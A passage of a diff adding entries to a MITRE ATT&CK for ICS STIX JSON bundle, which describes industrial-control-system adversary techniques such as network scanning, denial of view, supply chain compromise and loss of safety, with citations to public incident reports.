"https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Network Service Scanning", + "description": "Network Service Scanning is the process of discovering services on networked systems. This can be achieved through a technique called port scanning or probing. Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall. This does not reveal the service that is running behind the port, but since many common services are run on [https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml specific port numbers], the type of service can be assumed. More in-depth testing includes interaction with the actual service to determine the service type and specific version. One of the most-popular tools to use for Network Service Scanning is [https://nmap.org/ Nmap].\n\nAn adversary may attempt to gain information about a target device and its role on the network via Network Service Scanning techniques, such as port scanning. Network Service Scanning is useful for determining potential vulnerabilities in services on target devices. Network Service Scanning is closely tied to .\n\nScanning ports can be noisy on a network. In some attacks, adversaries probe for specific ports using custom tools. This was specifically seen in the Triton and PLC-Blaster attacks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--539d0484-fe95-485a-b654-86991c0d0d00", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0841", + "external_id": "T0841" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Indicator Removal on Host", + "description": "Adversaries may attempt to remove indicators of their presence on a system in an effort to cover their tracks. In cases where an adversary may feel detection is imminent, they may try to overwrite, delete, or cover up changes they have made to the device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "File: File Metadata", + "Windows Registry: Windows Registry Key Deletion", + "File: File Modification", + "Command: Command Execution", + "Windows Registry: Windows Registry Key Modification", + "Process: Process Creation", + "File: File Deletion" + ], + "type": "attack-pattern", + "id": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0872", + "external_id": "T0872" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "I/O Image", + "description": "Adversaries may seek to capture process values related to the inputs and outputs of a PLC. During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules.\n\nThe Input and Output Image tables described above make up the I/O Image on a PLC. This image is used by the user program instead of directly interacting with physical I/O. (Citation: Spenneberg, Ralf 2016) \n\nAdversaries may collect the I/O Image state of a PLC by utilizing a devices [Native API](https://attack.mitre.org/techniques/T0834) to access the memory regions directly. The collection of the PLCs I/O state could be used to replace values or inform future stages of an attack.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Asset: Software" + ], + "type": "attack-pattern", + "id": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0877", + "external_id": "T0877" + }, + { + "source_name": "Nanjundaiah, Vaidyanath", + "description": "Nanjundaiah, Vaidyanath PLC Ladder Logic Basics Retrieved. 2021/10/11 ", + "url": "https://www.ezautomation.net/industry-articles/plc-ladder-logic-basics.htm" + }, + { + "source_name": "Spenneberg, Ralf 2016", + "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:16:25.031Z", + "name": "Denial of View", + "description": "Adversaries may cause a denial of view in attempt to disrupt and prevent operator oversight on the status of an ICS environment. This may manifest itself as a temporary communication failure between a device and its control source, where the interface recovers and becomes available once the interference ceases. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay) \n\nAn adversary may attempt to deny operator visibility by preventing them from receiving status and reporting messages. Denying this view may temporarily block and prevent operators from noticing a change in state or anomalous behavior. The environment's data and processes may still be operational, but functioning in an unintended or adversarial manner. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0815", + "external_id": "T0815" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Execution through API", + "description": "Adversaries may attempt to leverage Application Program Interfaces (APIs) used for communication between control software and the hardware. Specific functionality is often coded into APIs which can be called by software to engage specific functions on a device or other software.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0871", + "external_id": "T0871" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Supply Chain Compromise", + "description": "Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment. \n\nSupply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tools distribution mechanisms. This may involve the compromise and replacement of legitimate software and patches, such as on third party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. \n\nCounterfeit devices may be introduced to the global supply chain posing safety and cyber risks to asset owners and operators. These devices may not meet the safety, engineering and manufacturing requirements of regulatory bodies but may feature tagging indicating conformance with industry standards. Due to the lack of adherence to standards and overall lesser quality, the counterfeit products may pose a serious safety and operational risk. (Citation: Control Global May 2019) \n\nYokogawa identified instances in which their customers received counterfeit differential pressure transmitters using the Yokogawa logo. The counterfeit transmitters were nearly indistinguishable with a semblance of functionality and interface that mimics the genuine product. (Citation: Control Global May 2019) \n\nF-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "File: File Metadata" + ], + "type": "attack-pattern", + "id": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0862", + "external_id": "T0862" + }, + { + "source_name": "Control Global May 2019", + "description": "Control Global 2019, May 29 Yokogawa announcement warns of counterfeit transmitters Retrieved. 2021/04/09 ", + "url": "https://www.controlglobal.com/industrynews/2019/yokogawa-announcement-warns-of-counterfeit-transmitters/" + }, + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Serial Connection Enumeration", + "description": "Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands. Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems.\n\nWhile IT and OT networks may work in tandem, the exact structure of the OT network may not be discernible from the IT network alone. After gaining access to a device on the OT network, an adversary may be able to enumerate the serial connections. From this perspective, the adversary can see the specific physical devices to which the compromised device is connected to. This gives the adversary greater situational awareness and can influence the actions that the adversary can take in an attack.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Input/Output Server", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--5f3da2f3-91c8-4d8b-a02f-bf43a11def55", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0854", + "external_id": "T0854" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Safety", + "description": "Adversaries may compromise safety system functions designed to maintain safe operation of a process when unacceptable or dangerous conditions occur. Safety systems are often composed of the same elements as control systems but have the sole purpose of ensuring the process fails in a predetermined safe manner. \n\nMany unsafe conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable safety system functions as a prerequisite to subsequent attack execution or to allow for future unsafe conditionals to go unchecked. Detection of a Loss of Safety by operators can result in the shutdown of a process due to strict policies regarding safety systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0880", + "external_id": "T0880" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Productivity and Revenue", + "description": "Adversaries may cause loss of productivity and revenue through disruption and even damage to the availability and integrity of control system operations, devices, and related processes. This technique may manifest as a direct effect of an ICS-targeting attack or tangentially, due to an IT-targeting attack against non-segregated environments. \n\nIn cases where these operations or services are brought to a halt, the loss of productivity may eventually present an impact for the end-users or consumers of products and services. The disrupted supply-chain may result in supply shortages and increased prices, among other consequences. \n\nA ransomware attack on an Australian beverage company resulted in the shutdown of some manufacturing sites, including precautionary halts to protect key systems. (Citation: Paganini, Pierluigi June 2020) The company announced the potential for temporary shortages of their products following the attack. (Citation: Paganini, Pierluigi June 2020) (Citation: Lion Corporation June 2020) \n\nIn the 2021 Colonial Pipeline ransomware incident, the pipeline was unable to transport approximately 2.5 million barrels of fuel per day to the East Coast. (Citation: Colonial Pipeline Company May 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0828", + "external_id": "T0828" + }, + { + "source_name": "Colonial Pipeline Company May 2021", + "description": "Colonial Pipeline Company 2021, May Media Statement Update: Colonial Pipeline System Disruption Retrieved. 2021/10/08 ", + "url": "https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption" + }, + { + "source_name": "Lion Corporation June 2020", + "description": "Lion Corporation 2020, June 26 Lion Cyber incident update: 26 June 2020 Retrieved. 2021/10/08 ", + "url": "https://lionco.com/2020/06/26/lion-update-re-cyber-issue/" + }, + { + "source_name": "Paganini, Pierluigi June 2020", + "description": "Paganini, Pierluigi 2020, June 14 Ransomware attack disrupts operations at Australian beverage company Lion Retrieved. 2021/10/08 ", + "url": "https://securityaffairs.co/wordpress/104749/cyber-crime/ransomware-attack-hit-lion.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Spearphishing Attachment", + "description": "Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T0863) to gain execution and access. (Citation: Enterprise ATT&CK October 2019) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012, targeted ONG organizations and their employees. The emails were constructed with a high level of sophistication to convince employees to open the malicious file attachments. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface", + "Control Server", + "Data Historian" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "File: File Creation", + "Application Log: Application Log Content", + "Process: Process Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0865", + "external_id": "T0865" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + }, + { + "source_name": "Enterprise ATT&CK October 2019", + "description": "Enterprise ATT&CK 2019, October 25 Spearphishing Attachment Retrieved. 2019/10/25 ", + "url": "https://attack.mitre.org/techniques/T1193/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Location Identification", + "description": "Adversaries may perform location identification using device data to inform operations and targeted impact for attacks. Location identification data can come in a number of forms, including geographic location, location relative to other control system devices, time zone, and current time. An adversary may use an embedded global positioning system (GPS) module in a device to figure out the physical coordinates of a device. NIST SP800-82 recommends that devices utilize GPS or another location determining mechanism to attach appropriate timestamps to log entries (Citation: Guidance - NIST SP800-82). While this assists in logging and event tracking, an adversary could use the underlying positioning mechanism to determine the general location of a device. An adversary can also infer the physical location of serially connected devices by using serial connection enumeration. \n\nAn adversary attempt to attack and cause Impact could potentially affect other control system devices in close proximity. Device local-time and time-zone settings can also provide adversaries a rough indicator of device location, when specific geographic identifiers cannot be determined from the system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Control Server" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--7374ab87-0782-41f8-b415-678c0950bb2a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0825", + "external_id": "T0825" + }, + { + "source_name": "Guidance - NIST SP800-82", + "description": "Keith Stouffer. (2015, May). Guide to Industrial Control Systems (ICS) Security. Retrieved March 28, 2018.", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Drive-by Compromise", + "description": "Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website. \n\nThe adversary may target a specific community, such as trusted third party suppliers or other industry specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. \n\nThe National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. (Citation: Cybersecurity & Infrastructure Security Agency March 2018) Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Connection Creation", + "Application Log: Application Log Content", + "File: File Creation", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0817", + "external_id": "T0817" + }, + { + "source_name": "Cybersecurity & Infrastructure Security Agency March 2018", + "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:14:42.829Z", + "name": "Damage to Property", + "description": "Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828). \n\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0879", + "external_id": "T0879" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "BSI State of IT Security 2014", + "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", + "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T20:19:14.351Z", + "name": "Spoof Reporting Message", + "description": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. \n\nIf an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Modification", + 